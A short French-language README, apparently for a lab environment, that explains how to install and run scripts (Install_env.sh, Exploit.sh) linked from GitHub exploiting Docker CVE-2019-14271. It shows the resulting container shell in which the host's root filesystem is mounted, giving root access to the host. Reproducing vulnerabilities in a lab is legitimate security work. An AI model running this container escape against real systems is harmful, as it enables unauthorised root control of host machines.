
Un script automatique pratique et rapide pour construire l'environnement et l'exploiter.
Un script automatique pratique et qui fait gagner du temps pour construire l'environnement et l'exploiter.
https://github.com/Metarget/metarget
https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-cve-2019-14271
https://github.com/thomasyang1207/Exploits/tree/master/CVE_2019_14271
chmod 777 Exploit.sh
chmod 777 Install_env.sh
sudo ./Install_env.sh
sudo ./Exploit.sh
Si l'image a déjà été construite, exécutez
Exploit.shuniquement pour une réutilisation.
Vous êtes maintenant entré dans le conteneur cve-14271 et vous voyez :
root@d9b5a334a0e9:/# ls
bin breakout home lib32 logs opt run sys var
boot dev host_fs lib64 media proc sbin tmp
break_logs etc lib libx32 mnt root srv usr
Entrez dans host_fs et vous constaterez que le répertoire racine de l'hôte a été monté ici et que vous vous êtes échappé avec succès. Vous pouvez agir en tant qu'utilisateur root sur la machine hôte.